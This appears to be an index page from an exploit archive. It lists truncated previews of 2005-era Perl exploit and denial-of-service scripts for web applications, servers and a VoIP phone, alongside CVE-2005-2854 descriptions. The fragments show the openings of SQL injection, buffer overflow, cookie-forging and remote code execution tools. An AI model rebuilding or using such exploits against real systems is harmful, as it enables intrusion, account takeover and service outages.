RBExplorer 1.0 - Hijacking Command Denial of Service

!usr/bin/perl RBExplorer Hijack Command Exploit ---------------------------------------------- Infam0us Gr0up - Securiti Research Info: infamous.2hell.com Vendor URL: http://www.kabrian.com /[email protected] use IO::Socket; if @ARGV != 3 print "\n RBExplorer Hijack Command Exploit\n"; print...

phpWebSite 0.10.0 - module SQL Injection

phpWebSite 0.10.0 - module SQL Injection !/usr/bin/perl use LWP::Simple; $serv = $ARGV0; $path = $ARGV1; $name = $ARGV2; sub usage print "\nUsage: $0 server path username \n"; print "sever - URL\n"; print "path - path to index.php\n"; print "username - name register user\n\n"; exit ; sub work pri...

CVE-2005-2854

CRLF injection vulnerability in thesitewizard.com chfeedback.pl Feedback Form Perl Script 2.0.1 allows remote attackers to use the script as a mail relay spam proxy via CRLF sequences in the 1 name or 2 email fields, which are injected into mail headers...

CVE-2005-2854

The CVE-2005-2854 entry concerns the thesitewizard.com chfeedback.pl Feedback Form Perl Script 2.0.1. The vulnerability is a CRLF injection in the name and email fields, allowing remote attackers to inject headers and use the script as a mail relay (spam proxy). Multiple connected sources (NVD, R...

CVE-2005-2854

CRLF injection vulnerability in thesitewizard.com chfeedback.pl Feedback Form Perl Script 2.0.1 allows remote attackers to use the script as a mail relay spam proxy via CRLF sequences in the 1 name or 2 email fields, which are injected into mail headers...

Simple PHP Blog <= 0.4.0 Multiple Remote Exploits

Exploit for unknown platform in category web applications ================================================= Simple PHP Blog order allow,deny deny from all order allow,deny deny from all --------------------- Snip .htaccess end --------------------- Solution 3 See...

Simple PHP Blog 0.4.0 - Multiple Remote s

!/usr/bin/perl -w =============================================================================== Title: sphpblogvulns.pl Written by: Kenneth F. Belva, CISSP Franklin Technologies Unlimited, Inc. http://www.ftusecurity.com Date: August 25, 2005 Version: 0.1 Description: This program is for...

Savant Web Server 3.1 - Remote Buffer Overflow (2)

Savant Web Server 3.1 - Remote Buffer Overflow 2 !/usr/local/bin/perl Savant Buffer Overflow Exploit ---------------------------------- Infam0us Gr0up - Securiti Research Tested on Windows2000 SP4 Win NT Info: infamous.2hell.com Vendor URL: http://savant.sourceforge.net $ARGC=@ARGV; if $ARGC !=3...

SimplePHPBlog Arbitrary File Deletion and Sample Exploit

SimplePHPBlog has a vulnerability in its commentdeletecgi.php. The PHP script allows for the arbitrary deletion of files. Please see following link for a perl script to demonstrate the exploit: http://www.ftusecurity.com/pub/sphpblogvulns Please add .pl extension as my ISP server preprocesses the...

Savant Web Server 3.1 Remote Buffer Overflow Exploit

Exploit for unknown platform in category remote exploits ==================================================== Savant Web Server 3.1 Remote Buffer Overflow Exploit ==================================================== !/usr/local/bin/perl Savant Buffer Overflow Exploit...

MyBB - member.php SQL Injection

MyBB - member.php SQL Injection source: https://www.securityfocus.com/bid/14684/info MyBB is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. Successful exploitation could result in a compromise of the application...

gtchatDoS.txt

!/usr/bin/perl use LWP::Simple; if @ARGV 3 print "\nUsage: $0 server path mode count for DoS\n"; print "sever - URL chat\n"; print "path - path to chat.pl\n"; print "mode - poc or dos,\n"; print " poc - simple check without DoS and exit,\n"; print " dos - DoS, you must set count for requests in 4...

invisionCookie.pl.txt

!/usr/bin/perl -w This one actually works : Just paste the outputted cookie into your request header using livehttpheaders or something and you will probably be logged in as that user. No need to decrypt it! Exploit coded by "Tony Little Lately" and "Petey Beege" use LWP::UserAgent; $ua = new...

Grandstream Budge Tone 101/102 VOIP Phone Denial of Service Exploit

No description provided by source. !/usr/bin/perl use IO::Socket; use Term::ANSIColor; U S A G E system "clear"; print "\nGrandstream BT101/BT102 DoS\n"; print "written by pierre kroma [email protected]\n\n"; if !$ARGV2 print qq Usage: perl grandstream-DoS.pl -s ip-addr udp-port -r/-s ip-addr = ;-...

quickDoS.txt

Details: ======== Input to the user commands is not properly checked and/or filtered. Issuing a long argument to the user about 1024 caracteres commands will cause the corresponding process to die without any error message. this vulnerabilities exist in both the professionnal version 3.0 and lite...

FtpLocate flsearch.pl fsite Parameter Remote File Inclusion

The remote host is running FtpLocate, a web search engine for FTP sites written in Perl. The installed version of FtpLocate allows remote attackers to execute commands on the remote host by manipulating input to the 'fsite' parameter in various scripts. %NASLMINLEVEL 70300 C Tenable Network...

Open Bulletin Board 1.0.5 - SQL Injection

!/usr/bin/perl -w OpenBB sql injection tested on Open Bulletin Board 1.0.5 with mysql coded by x97Rang 2005 RST/GHC Gr33tz: blf, 1dt.w0lf use IO::Socket; if @ARGV != 3 print "\nUsage: $0 server path id\n"; print "like $0 forum.mysite.com / 1\n"; print "If found nothing - forum NOT vulnerable\n\n"...

AnalogX SimpleServer:WWW <= 1.05 Denial of Service Exploit

Exploit for unknown platform in category dos / poc ========================================================== AnalogX SimpleServer:WWW Prepare to start connect.\n"; sleep1; $s = IO::Socket::INET-newProto="tcp", PeerAddr=$ARGV0, PeerPort=$ARGV1, Timeout=6 or die " Target web server already DoSeD ?...

XML-RPC Library 1.3.0 - &#039;xmlrpc.php&#039; Remote Command Execution (2)

------------------------------------------------------- /| | | | | /\ | | / \ \ / / |\ | | / /\ \ \ | | / | | | || \ || | | | / /\ | \ || | / | | | ||/ || | || / \ | || || | / | | | || \ || | | / / \ \ | || || | / | | ||| || | | / |/ | || || | | | | || /| | | | | ||/| | ||/ | | | ||| | |...

XML-RPC Library 1.3.0 - xmlrpc.php Remote Code Injection

XML-RPC Library 1.3.0 - xmlrpc.php Remote Code Injection tested and working /str0ke !/usr/bin/perl ilo-- This program is no GPL or has nothing to do with FSF, but some code was ripped from romansoft.. sorry, too lazy! xmlrpc bug by James from GulfTech Security Research...